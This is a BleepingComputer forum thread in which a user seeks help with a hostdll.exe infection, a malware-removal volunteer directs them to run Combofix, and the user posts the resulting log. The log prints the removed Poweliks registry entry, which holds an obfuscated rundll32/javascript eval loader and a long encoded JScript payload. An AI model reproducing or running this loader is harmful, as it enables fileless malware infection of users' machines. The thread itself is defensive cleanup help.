Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

hostdll.exe help


  • This topic is locked This topic is locked
12 replies to this topic

#1 morris79

morris79

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Local time:10:46 AM

Posted 11 September 2014 - 08:53 AM

Have a computer the recently became infected scans are now clean but I am sure it has a big time hostdll.exe problem. Ran Farbar and here are the files. Can someone please Help?

Attached Files



BC AdBot (Login to Remove)

 


#2 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:05:46 PM

Posted 11 September 2014 - 09:34 AM

Hi there,

you're comuter is still infected. Please run Combofix:


Please download Combofix (by sUBs) and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start Combofix.exe and follow its instructions.
  • Do not use the computer while the scan is running. This may cause the program to stall.
  • When finished, a log file will be displayed (that can also be found at C:\Combofix.txt).
    Please copy and paste the contents of this file into your next post.
Note: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." after the scan, just restart the computer.
(You can find more detailed instructions in this guide on using Combofix.)

#3 morris79

morris79
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Local time:10:46 AM

Posted 11 September 2014 - 10:04 AM

Running Combofix now. I will paste the contents when it completes.



#4 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:05:46 PM

Posted 11 September 2014 - 10:19 AM

Ok.

#5 morris79

morris79
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Local time:10:46 AM

Posted 11 September 2014 - 11:40 AM

Here it is. Thanks for the help!!!!
 
 
ComboFix 14-09-11.01 - Paul 09/11/2014  10:09:17.1.2 - x86
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.3548.213 [GMT -5:00]
Running from: c:\users\Paul\Desktop\ComboFix.exe
AV: McAfee Anti-Virus and Anti-Spyware *Enabled/Updated* {ADA629C7-7F48-5689-624A-3B76997E0892}
FW: McAfee Firewall *Enabled* {959DA8E2-3527-57D1-4915-924367AD4FE9}
SP: McAfee Anti-Virus and Anti-Spyware *Enabled/Updated* {16C7C823-5972-5907-58FA-0004E2F9422F}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 * Created a new restore point
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\users\Paul\g2ax_customer_downloadhelper_win32_x86.exe
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct: 
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}
   <NO NAME> REG_SZ         Thumbnail Cache Class Factory for Out of Proc Server
   AppID REG_SZ         {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32
   <NO NAME> REG_EXPAND_SZ   %SYSTEMROOT%\system32\thumbcache.dll
   ThreadingModel REG_SZ         Apartment
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32
   <NO NAME> REG_SZ         rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
   a REG_SZ         #@~^7H0AAA==n{F+2im'xh,)mDk-+or8%mYvEUmDb2ORUtVsJbIStrVc+e'*+* Y.zPhxlc3XwC NAx\bDKU:xO?DDrUT/`rYhbxNb.YJ*ia'A_Ew'/z/Dn:2 wwSkx[GS/2WSnM/4V^--7FcT-'wGhDd4VVcn6Ji6xU+SPzmOk-nor8L^YvJj^MkwOr o sbs?zkY:r(L^Yr#I0!x^ObWx,^N `#PO.XPDY;DU~mR]+T]+mNcE_|S\w'/G0DAmDn'-skmMWkG0D-wxY~WMl:AWM3PknOEa-'x[www7  !cX!F {w'/wEbp8^lD^4`n* M+Y!D ~!p8N0!x^ObWx,[`!# XxU+SPzmOk-nor8L^YvJ\dX:V+ U+.\.oHJ_K:nR+RZE#p6 Wa+UcrM2:E~!~0msd+*iXRd+U[v#IE6U'mR3aalx[3 \rDKUs+UD?DDk okcJuYn:a]wwr#_! /!4/D.rxT`!RsldO&x[+X60vJ&E*_FbI!0UY{;6xQrRD:wri!WY{0 ZM+COK+XOsbV+v;WxD~DD;+SR8#Ik6cE6Yb`!0Y MkO+vacDnkwKx/AK[X*i;0DR/sK/+vbi!0'6 /DlD+P+aOwks+v;0 ~O.!+#I;6Yx0c!YobV`E6xDbi!0d'!0O }w+ )/:+6DjODls`bi;WkR]+m[`y#I;6R.rD+cE6dcInmNvE0DRUryO+#*i;WkRZ^G/`#p;WR;VK/n`bI6R9+^nYsrs`EWUD#Ilc]!xcr-rJ_!0 QJ'J~z$ErnDPz GD/Ym.OJB!BFbiW G+s+DnsbVnc!0xbI)8Atbs`Z6RwkV2Xr/D/cw*#`r6`m9U`*''Zb`NvJr#I8[crJbi)clc2U-bDWUhxO`rKMW^/kJ#*`rCJ*'Ek6~c]K+XORAxmK[rxTT=))?/(&R!+DjYMkULv$ZGU7+.YYl=s.K:~l/vWjYMkUovB[ux*+ytF(:1ZC ,!qVNV+q$4mhsD(Z44i!wX5 q^N!.HFwA-1 ^!lq,!KKz/PwEt!w!42B*h?I`^U.^|j!Lq]lm!.(p.ZoBo~tmhoD}pI^^ HdqF~tmssDt("V^k4p8fgwNVs\(L!XF#!T8IXm!#9q/IUt("F^hlj+p$^n#Yq8yVVo?0G9wIl^MjZ[^/t!jXnjOA1CAA8+F4lq*[r%2GNp9Htl!]!OY5 s!SVI^tsV;\j"*4ssDCgA^&gV8 x/+ULW::.2Ji,bls.%N/$:+p1ZtZEihj:4!#NN!V78b*$1&gV4q9knjlt8`W(sxV}saVI&I^t3I^4V.U5p]^qr3aJsDKnpg!} T!jh.s8V.%9M^\4b*w8^!J3wy^+jY5sa*5x.a8!I^m0s%5+#.mq!+6VxF8r0EI!#sl *^]_V;I8w5ZF7tCj/t?Tkj l1}qq\1xVg8+I84VjrS/]s5 6.t?0E]!j:l X^.uVStUor9Z&/q01ke(gyJs~FehXw5HaK\skt pkpq*"liHk5p1.J2wF[!Of4!o.mzqk 81X1&"V4U*g[X!Cgt^f"2}qaV\ sZt#!arHIi+p$^pU.a8M"V^rl2} ta4h.G8y*"9CxF52I7^kTkiV"K^!jLlqo/::sDtj6&lqIspUs:l mkiCjk8!^Lqra(jfV.[V.OdVxV}s6^e&"w8 WE}+w/4VsE\!178U}^4 I24+X.(PW+i&"t8h"tmh}k9oA4^ssO\("Vm HaJVgV[2^Y^!XV4q#E9MsZC ,!Is64}f\Kqs988x"w8 `/K o!5 N^t;q2}X"j+oA^}xjw8M"V^rl2}qtw(:.gtpIK4ypGqVs!Nh,Mt?&/(s~F5haa5z6&CqIs5x^KlqmkP:j&i X\[/XloB!9sk(rh0js.TNpB!.uVSt?S3i!wX5 q^N!.H^H3;` j!?qFS8MjYtl!ep"w4yXM(Ms ^zobj .;N!sD}j6geltt+j3qrVFmh.Z[o9;&Z"j+oA^}xjw8M"V^rlfms#t9M.`npA^|;3{0 t84h1ZCOE(!9t+q$4mhsD(;t8`MwX5qF^[MjXFs~\^+^!lq1EhKbkP s!}VsT4fBlnjI`^xjVF#ZoqHZmhV!t8!Lx28\}_.kt?X4iMwXe 8VNV#XnsA7^+VZlq,;nP3kK s!tMw!8fx*nj]`mU.^Fj!LqFg!msV!tFZoBs~X8+gV}_#X\?3FBo1lm2Is4io.m+.De:X*K#DAmu$A4+F4Cq*[}LafNo9Htl!]MOYe ^ES0[V92s.^+.D5s62}p\K|p6oCMjXtj8n5h2^5fIFBw%;" X\5ssk}(gyt8k8u^f5qHW\?bD} *0q;IWSVa75+sZCOEJsgh4!sZ|/91p;q2qXZ6(U*w^(jt8CtW(sg*m2]V(?*08!hb|o!{9o#!m+sstjlt[!^ }iq^N!t7t_H1xsg*m2I^8jwy^ jYehX*S0[V9sIl^!jKq0F25fB7m+,s[Zl(C WyHrXj4U14ts.6I("wNs.gt("W8 "y(r0Gms#!9(9!(/Ij4 14}h#}5pIa[:j1tp"W4+].SVN^[AFs9M4\};ob] j!iCx\eTw3}_BV1&HbFj*x4 }-l+iK9!*88MS/}/44jfs.N!.DJ^9q(x"w4qj!jl!t(x\^ogVm twI ..JVt44sId}#B^}s!KP:j&JiOklh#NN/A:no1T\ZEj .![M^Yt?l98U"Vms1h` .H[hVN}oH;?!o!}!6^i:j:F/4r}p^DK+9$tq1T&2^ENwAZ^k0/BsjE^+w:}`Xt9MVytiF^NVt-}u\!I+.ZPj!C!O3|/B_}pIg8yIq(Mjq5q*08M`kF?l98U\\lyiWxM*88!hkp;oVK 10N 6^F?0wFjS3juB75+.0[o9sn?0G0jY;n("V F8N(/"hnjOf( *ytp9Z(:WIUB74i94^ ` Hog!mhs!}zob#^V+1 1D+V,48("}e88 ^..8s("&Al h,kIsFdluob4 sniVac wY.hqa.#N^#ZNA1Fa\4A}7]:46PKxtjsxt?^stm3wDC#.ol8Nu4f#m4+6V^MXW^#aC5i2U5 t\eqF*(^..2so] w|i:wc8 ^..2#lU!.2}is~pooA3oq4 6lt283]U4q.h4bIit&is1G1 xCrqwWCF41}j^!}i"MKZ]&5(ton9AIjjIur 4mK IV\jjc^o^EK34U}!tKey*d5x4DV1~P"M^!j38!"MIA4?IV9le%9}p oA."]mIq9l V9kjoxk+u2NrowV[sN9:C^M}`6G# w2t.g& "K.ZaLj21}#sw +b,XNUs$jsqMCXI#h82?s#shWH[2pXtjxD}`p7[&4*H:OpJT"qj:#n}MoXnh,Z.01BN3H5?pIw]j4w]oa:}To~r3Ytt`19:MgZ+`6o}FgHijxx]94xjVoAd&snt!.a?^ts+i2U}#1V[!AD] 9xpio~Kf1tC:soqKIc4`6It(^HtMjwPox:l`a2U15[uNUIVVjT[ HsoW}jwpj+^.H"$$.#t"}U,B1sx:jZ6Utx^H M\I]9x9mA#Z\22yiVq.jqI]4r1U}UVAt:\&phgf.t]s}un}twsku:"vpzw`tvgr#mxanu9f4a**u(i}6ivs5z9rpi]liuan]mxz\ixDpT}MpPVlHNI}g25y.`Ia s4&Jy~5H!0hG]ntstMe+,oK^9%psojN%Vq62^!\ig9N #"pV.~}`V("!xZI`s~]&~AejwA[TwAp`}y9LV+#iN7pU%XpT2U}hVV[!AD]i\xIio~?pIt#0V6(f^ApZhMi2OD]f93P3\9Hj#C`!s+n#N\181fU2g1uId}!^yniRc1PB~4f}hCV1dt2\}NGVGj("*]2^qj3xZI`oA5.b.CP17I`2-lU2Spj/.i&9kJqx:jT]2l m8#V}j(a}N_N5}.~&CK5 }iwAp`oxt&N;]3s;Hw1tHP4~jpVt]C9pj#j:r#eZ? 6VH`Ve5"fN`6I[Fw2 M\;^V4\mZ]WI!q8}s2MH2NKmT4aH9HZCVjIjiw/I/10}#p7#s}9U3A!jAI;jjZ&}j45t!0hG]x}M1jtfWWpqIrNia$m#s~}jwfjs"VpTa$mis~}`s9:fxfNV.}}.~9tyx5\3wnm.Bwt.t Pq}IHV1.TXqNhwUH:lIC a5lTsa.st2]GN%qsa\w10}(^ZHCIci3wAp`}h5jFU}#9XI_tfK/1`}VqXHjwM\P^Aj31aHT.wCV}Ct(1!NAV5j("1}!gW^iwC4Z(\tF.x}Pt$S.AsmTHgr39s MX jU9Wpio }pNx}js$5.\ s;] 9APjwA}p\xpjoA5j9oe NASZ}4pVo`pi1tH3^5[35!.3X~jis~#:s%L&6Ks%7[y4A}j\5Jf"fjq1A`js~Pp1GK;,tNV0W1Uq7]VgW}s"ApTt2pjYhCsNo5jw9m.3l]jx1}j9WtqAhNZo\k,I6PVK4yIoKVq~pU}b#:\:eu4dj o&pip7\:Ie5"2H`s4]&42#2wZi ^.jqOC`Z,IC!1;HA6BNsodH#sM]jXD]3wIpiohri5H}q,+`:0yjqYwjKAcj3xKPu^ KyOcmFsj]VsGI_N$.zO~pVs~}jOy}TZcpTt2pjYwjqNo5jwC4Zt4jM42#2wZ#rOc.sHIj(N~CpWSm8s#NTo rosgCMgZ\ijpUo:.+V~i:Af5?R&jqYd}jjA}.z\ !wZpytj5j1}iV1"j.}roelIi9g}j^5}i5!.!#~pis~P:t/59vH`VZCy~A]f\rip"DHAoL\FN$#V6mK0su4Ts4KptA#2wZ#rOc.hH".pN~t.t]:4LpNsUH DI8L~&} 0cIZX.5jNn#V1"jqVGpVoKKVWXFFg!]iaZph0HIi*g}`}!(Fwsj0F~}.9X}jwA}#jCl`q?"(N~#h6ISZ}pl3B`pi1An2xc^iwMpse71qsMjZso5jwpS8t4t!l\n2j?PiwM;1Mjxt;#3sGI_t$+it2?o}It&K6jp"DH3oAHTVdn_N q("DHAs~ijwA}jDs# OsNZ3\g!s~]is~pqsHl3#`pi9o#:Ic#hwsIVq~?#Aw]`I}IV`6p^57HFwDj!ws}iwpS84\`V1 #3s;.;%fpiowpis~}VwIiVwAps371qsMjZso5jwpS8tKtCgpCsjjFzR\rq1AUjs~}i}}.b,*.+H"IpN~ fw Jf"fj##~jis~J2t#`.w.NZsICV~A s^q]igAI`oA:jVw}i}oKGNBj!dM?it.^jws}iwMs4$.#sMj`}/(!wx?`s~if4jjjMPiwC4Z[t\!}X}p5W.0*oIVq~?p}2tXR&JT5!jTH~pis~P:t9::\fjjsxhxjx^kx\}q9C48ol( 6wjV9"+ N!r qa.#sM]XVPsxfj##jIh9&i01]\ \&p`s~tL4]3jMPiw9Ao3j.w7Jz%7Sy5a5r1VjUt;#2wf]U9q.PB$.#sM]A}9:Vxfjj.j]:w|t3gI jOc.qOIj(N~C!1;H`ttN3#npVYtnj8q^3gA|"Bl5Tt }ZNt"C^C5`wAi.gV#2wfPu4FmZO9Ltq]i.VK`sBj3V7HPV^C?Dtu1X4To4}Tp7tA1]:?Oc.oN"#(9AtXO;J+"nHjot" N0#3sA429}/07Hip7]V^c}#"AIu(H.sN}e01P:9V+ N~}jwA#Kwl !wYNwst(.}DC#.oKjNumusm4+6VC:XW^ xY5i2UV9\eqF (^..81o]&~y :O/]hXMl_o1t:sniswmqs5?hqa.#N\#!9\[#a\43tD4!tX 0N4UVxl+wVg6("YC.j(t wY+wsl( 6V8TN4?^94?hqa.#}N[j5D\VwAI34U.#9geN9!m&Th.0V`] Xwe&g3]s"CI sVj.}Dn9Aqjq.oITsI.V6&iV"?joa5jsoWHojZey!XmVwL}A}5]FxDe 88pTh.0oLt!,x o.t?w9jl3]bH!68nf~.e+w5jU$\5+IVj`N*1MjY.ZVIiF"qi:"?]!&hK sctst\ sNVHww%}3e.I 68eygjjoxVph4b4i*kC`5"m&Th.q,U M4ht283]VXMjs1L(.}Dn9AjN8VpjTsI.36&i:jW#!j5KVBWHot.e0N*9V0c}A5W]3Whe 8/8pThG$k(.x !}b?w9 jUtbIq.+nf~ i8w1 ObK IVFZmX1Fa(?AtUtxT6t2"1npTh.`oH(.9.eVVK}A9H}3tGI".kt242joxI+uH0HhhynGA#`jXYj 1bj43]383]UwZ1Aqn1V9DC#.om2oA.f#M. 2HCL9wj99&piom4+6V[0NPm28Ap`s~P"M^&tX} jD.sqctsmH\hN&?w9rl!X+}Uw+nf~(FT\s4i].K IV[2I.Uy^rHqFW\s4C}3XFPowA+`]&5(Vt63V.H^w-KrOtphoXPf"!FT89HiX$? 60eZ1+g0hHoN~6M8r]3"Yjq\Z.Zq1(ss}CsAbp.H".iG7Ho}2tyt6[T"qK!s H"s2]At]}jR\pNsWj(56^2^!]q~9NA#1UMNAn!,Z1AwBN3sx?pI"j2^!}i9Aj/O~r9IA\q,d}(a2j;,a#Kx9C.\(] ^5Hq1wj.} P"tgjVt-.io~piIH]MO!\V9949oSKf}GC:sp"0hH0Va\s41]f9L] j9mZqFq(HWt+N5KyV#HpH$.#}w}?R!^ox(+i2I31ti^t9:s\(NZpSj(~s}VjIHsxZ.0#3`c7istGIV}ep#$NN#NAtV4Ai!"IKT2s.q1n#wNX:V"jjow2} Xre3^!Phx9mw#ZjssAniIS.`Iij%o;lT1AF!A*nPI!j9]AHq.ACjo"`0yHq,UHMS*ej"!6#^q?Zt.tj,}issKjU%a.hOari1tia*P!aZpTo~pis~C:I]`4Ap`s~}.~SC.\8TZ*? oM"k%.6pw5H^1B43t\Iu}A]f"tjiwApio$.i.gCj. 1 0h. 1a[!wvJ&9r]hw9mw#pjV2y]VIKH`9.}i}7NfAl6s^pJTgEjiq Ho}.]0.tg "(p 3HP&"}e?O}# 06jo4sU(1wP#s}.ss$KVt4? 60e3^yjP\v?Ta0.+Vn wt9:V"2I`1a\F\&]f1F\3l3jj$!m:/26P1j?H%A.U["icle!xMnP`!K%sNpV5S];%X":x9NA*bj(g1Cj" P!"Lm Bfq(IVeVV.IqN-43t\?PsV]!\Z#o`!HitqIVp7#^Nj`?R6wsaJ!gri:jWi#`6KZX?\:t"J"sql8.}r#eS? 6V 306]VDMI/105#p7#sI/jM^.A!76wri:gWi a...]." ,w#PpXI s!I/1q.T22[yg&^h0h3sa+V1tt^tX::4&poN~}jxIJywCqj9?A4A53s~}i}sS8}pjs37HqtxJyw}63RcK%4~Hh,X#Z}3dF\L+V}ICV~A#y"p]h"140HZ5j9qCjYWj^. Ks[qHUA~ejwA[TwApzO~IVs~}`}tkR6}b,0iaq}Vjw\s"Ip`XA5js~JftqrwsoNToar m2\&1D] ^Ipio~?PsVFZ}/j wZ}Zs`ijxjJyg.j ^5H.4c9F}x[!/Sp`IUpio~j9tqtjjZPiw93o0Iq9I#Ns6jsI6}b,0iaq}Vjw\s"Ipj$A5js~JftqHwsoNToaST226Kg?]hw r#[WNq}x[V/A5jjAp`s~if4 2jZPiw9H`e\"39oJftj1wsoNToK5T1ti:\c\3j\j9]d4s.}n_N U("DHAswijwA}jj:^VxtK0q!myA~#U5W.swopVq~Kf1tJ&4( #wsNTo7Hu3H#ws9:CT6rq.o6Mlf}3wZ#h0D+`}&"s9`#h,ZH`1!}uo_I%VX] O joa\43e2IhtDCj.e9wxIZ*Ut(4ICVj}H3Z*NwowjLHSn9AIN.tojVq~j9tqtjjMPiw9.3oA1o1W}js$5wx.^Vhi.\9[Mkh} g&.y2K:sw}}iVZI89B43e8?PsVHj\fPsxL+oo4p+,w}`s9:VxIlwsa fg1C.Iyi ^H8swjL1jC#5.5yV H+[a.%17J&4\ow.NTohr3F5C0NB53wAp s;8M1F}Vjw\s"Ip 2ZIj*x[!/Spqw#9]jIh57tsw;JT\jpVo`pi1V[Z2."jaxI`s~] Oq#!"D]sgH0XAU2FV8"AaH^I]pTa5jft~#2wfPsx:+oojHi*X]y5Xt?DpS8tKe!wpCMj.}iwAp of":m8}s.aH^I]pU2;5i*x[Mkh} ^cHss"IpN~J.VK"ZDq48AKe!wA}jwZ^ig}.#Zj3H#os;+094KVsZl"A~e9?8Tw2pio~j93XJZN-5?Oc.yN"](9AC?Of]%^x|Z#/5js~}iN7?8N3lTt:Kow}}j41]hRhlPB`ji1}is}*`?RyGtq8OlJyg5H/R*}`t&Us94e NZ`,].VsZl"A~e&9(CsgHVX~j9oHJ2t#U.wsNZsat!5DnjAD\U9MI;1r9Ltq}V.;K`sBIP]~pTs~}j41^ wx+oshj#}x[V/A5g&.yw:Psar}.z*\ignlG}c`Z%7J"1j?q%zp"B`jiI7CxIyJzR!43elKf1&J.VKmV"H0*~] 9At!wA} wxp^^\sNNii.2p:}fSz0S|f1_J&4( #wsNTo7Hu3H#ws3d ":lb,V (4A#2w2^Vt\rwtY"j9g}iY}KoI.H337Hq.xJ&4(P#wsNT3yNqN$#A6C:3w9NA5l]L^V#y4E}T"Ap^](,weis~NZs$ph1;I9t~}j"p\s\ rot7Ii9g}`V+qjR*1:AN8M"\}jws}iw9HN[Z53.~}ihZpq1oNTo8jis8}jw2nU~9HV];pVs~}`NG5(".HAsaJ&`DtC4hPiwHlZos5js~##AhlH,*.T#".pN~ty4IPiZ\5V4 NTs"}`s$".~&p`sIn:Shj3wc\3gk}.]!"KA~#i}Am01O}TqU.pN~ej"w\o"II/1V.ut~#As/jF\/^pyP!4*JXRDP949N0[5(C}G}VsGIGN/lo]q.swIejxZ]s"AppG7H }78U,(dXR64wwqF 4nJXR\J+wAlq#j5j9I#%s^?^99j [a.9sx[Mkh}jOc.Vo"IpN~#jbXt2aZjZwU}FwDejgZ]s"Ap^L " }WJz%MI_t/ph1XIi}g}j9w6ow.NT37+oN7i`.f5.jprw}k]jx1}j^ iR*r:$M"sbH[h57SZs$pTaWmTt ]j\Z /R*KV[`ot+eqNKn!j|r`F~]:x\\3O:JzRX}Z#A`js~eiIUI^I$ps^7+oNxi.j&} 1cjiTyIoo.JH%.m3"|r`F~j.z!J&1D]P9I?`oA"397PhV;K`sH5Tt:Kow}}jws}iwAI!1!K"H7J.Id"jafp:NW[XDs^&99}iw15ZtK:sw}}isxp`s$I!14NPm7Jy"5} "Zlj1~pVs~}`}V(!91p0F~] 1ciVj&}jOc.0#I"(N~HUtS4Zs/pio~I+N\[!j&} wq+3t`pip7]^.j5."ApH,~}3wA}jAD\TxIjy#j5j9oCpwqjs#NTojI+3WiVj&}p\:ro$~pi9q[ot2`."Ip^p76w2n2x?^iwC4Zo.dytq[3.;K`s!Kh1_Ki9g}j9;tqx.NToq.+N\P`jA5R6+:9`ij5\\Op]i\M}w]t5t_#3sASZ}#jVo`pi97]!jlPiwMj/1V}ht~#As9"x9q.jsq\:9xi:D&}#`\rwt"j}g}iV5I`I}rotMIi9g}j\Z8TOHjVX~IV*7PA.C:jwM.s,_j!x1}.z\#+wZlq[j5j97#3.mK`su4T3yj!9yJXRD]u4fjp22IV9"eqNF`wxIs%7[!j:}j9x OsNZ3\s}xii.2pqV#j OV?#bZJ&1D] gAIio~I+,~C^.fm!DMI s~# 4xi:D&}#j15ZtK:sw}}isgp`s$I/1V.pt~#2w2J+"fj##a.#sMjwb*j:asp0F~jjWcj3xx}i5!jq[A`js~#%9 5yYoH3ojr!1Vi!XlPVwAjio~pip7]^V/5V"ApZIW}(4\]!DZPiwprwec"j9g}i};.Vsul3[`pi9qejxW[q"II/0X4qAw]0}V(!9Zp0*~] 9}e!`h}jOc.0#I"(N~[Ut pjI]pzOIjT9g}jXD}ijApio$.#sM]8AKmFj9H:tn}:a\[ZDkJzR!Ao2gs1\}is~pqsHl3[`pis+6Xkj3x.lPB`jis:}`s$5K\AS257Jy^l#F9;}ia&lZ3\tFsMj#bW.^topVq~IV97\3jlPiwM5 2`Kow}}`,59f9 SH, 6sw1PF"Pp"DHAo3`(w&}s.aH^I]p#]~pis~Hx9IJTwApp2g.32ZPjI]g!l2j:Ih\3lDPV91\#^*1q2ktLA. hw~1AF3}f[t4i*yeVg&nV8K1u4hIos8PjI.jX;}2Nt]2`FPVt!niX;?:$1`ypZPVI.+As$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~#w}A5jwAI`s~}jwf}jwA}jR\rAoA:MN~}is~p`s$pioG}Ts~}jwA}iwApi1&1+,h}`6]UxaKI.I~#(arj.\3^!x;Kos95y.w#3.2N`I]4+O"pis~}j\Z]VwApVq~jiV~^;Y}sj&p`s~}jwA}jwA}P"Ap`H99&1;}+N~p`NUpio~?pAa}9A}iwApqLS4iVG}`9$5jwApoN~}jwA}jwAiiwZp`oA5jsG}is~I0s$Iio~pis~}jw.}iwIpio~pis~}`,/mjwxp`1~}j"tC&9A}iwxp`oA`js~]is~p`.$pio~pis"}jwAiiwApio~pis~]`s$5jwAp`s~}jwA}jwA}iwrpssA1MNG}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}.~2i#^x?ss~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$piotl"s"#D#ojvIio2ITVG}`9$5jwApqF~}jwA}9A}iwAp`oA5js~}is~p`s$pi3Zpis~H2tFPsjM?VtjHiFl#qN#5jwAIws\t!^A}:9A}iwf}ZoA5js~}is~p`s$pio~pis~}jOA}iwnpio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5";?o.g#MDyjxw\83wAp^tAU(}.tzY2m8jas4~?ppl}!9\ #1X4+o~?p}A s,d"L^M}2w"is^1 j1*C"wlA#29!IqtiV"IVI +i#A139G}(92noT!I#H~NTs~ijs5}sws}89~}jwA^!4W] XMl0#2929\n322.^NojiX;V9\iK"L^ia;Ih2A131DiqN$5K~Ml`.~}jg\3j(to99}q]f"3s&8h6$?V* l34Am39\Cf`F i&\r t~.#sa}ZI+"!5!+0*~jjgf\28VtTx\j`[A5jF~}#A;SZ1fpiB~?i9l 29A iw;?h^l.%t&t8A/\x9I`I~P2j\t!SyCrO.p8st5jY}]i.Irw.o1s]oK I2Cs"}83xM1u2\p#b7]^N25.\/p`V`]M"Y V"5#VZXAtM:V`}#V~IwwFpiB K/,$#f~VC"^E|TtGlVFVP`sB"!A!H`}A}.xI#kRc#s49p2s(5.I~ii9N+VVJr#HW+3IdP3wlPpgM1u[Gl+1;8Z.t5wA._9GJy4Cs~xPq^f?0X95&AaPV5l}`FfI3oor!*G]2w2JTl(pUH5IT.$C:A]m!x9mZ1~if4&J&4]i9yp`qY5L}~ift~p0sBpf#~m3.;}j4AtV8HK"s_pzY ^VF3t.ThI.N;]3^962`c\q^qNZ3h":t\[T%7|H,fSTt~j9Ig#j^f]q~AKio"j#s toNo51cjjs J 9fts"L}VZ\5b1r`s.giiVwpqVo5U2Ir35S]j^rtTlflh[t+is![shqmsgprwVVisjI#2gA]3wvjVBA"j,}tuN_Ib%".T1~I%V^CK4reU^LKp2~KiIG}0s/`VjKZ6diL~Itj\f\iw(IVtV(1~}iV$KAwqI/1ZN+N~CF^y^Tw&1"];osVj`6.qjwcpZ*q}Fw.#9Z#+w2rAB29!9o#hNK.8.ij32}NV9~]Fw&["~Z+%o5HPAxC0Vh5("3lAI2}4\j!jAji^Zps115t sVjI2tK4T^7HqsMj3Xx}igIp [~?TFlPj.ajw?I_Ns\K~9 28V}sxW?G]5"jste#sn?2N9?itgS"t_ikDy}TZ\r![NI9I~}qVUU!R\1:sw] ^9]K\?83j/pqHD"y}UPV6A`F}"H~?3}gi3j|n3xV?ioa.r,2j_w5d!l.sN4t!\5e!A\J"A\rGo1t3s2#is5HAs]}9]~5ht^]!j\CTxI.TB\Io}$t w#IF^p?Z6n#2w9}xws]+g(.`tM5Vp7]h9 l0FGHi#\losxe!w&iTwIIf[~+Pt&6ApzUj"*?:1gj916MI\89w?|2[t:CoMjuwKlwsa}PBKm#}o#:SD}p99l anm+1~Cs6G1.jC1AF~jD*C XW^ x9j`qIUFkPU1gpq6d}+44lVVgt!^Y89jy?ioGmuA\eqF]:(9sl.A!82\}}!wZ^iwS?sO\I:YV}isA?w9rjs[43WS}j83]Ujq.h4bIit&}`.p}MxC+_}\6saMi(gA[qwMH0#/9FVA\Vs;.qs(?hamm+IV\!wZCoa1Ve.}T1ti`s$:.`!jAsA]:xqiVw2]#"Crq4l:IVnis;Kqsp?UsWHotg .w|n j.?3[U}392i`sAs\s5N1N8!w66(at]TDAmoHl"FqM} w.HZqzphHnpp.2Cj4*\ig|ph[}m!w&ty6!q2wXpjV;6jl}ns";nV5&pqVytMwK^9AK.0s%p 1"r#t&ejt\63"phXNIopZn V9(3"\}Zs0]Mk&nj45P+^&pNofU(I_i3VZI`F$p%] 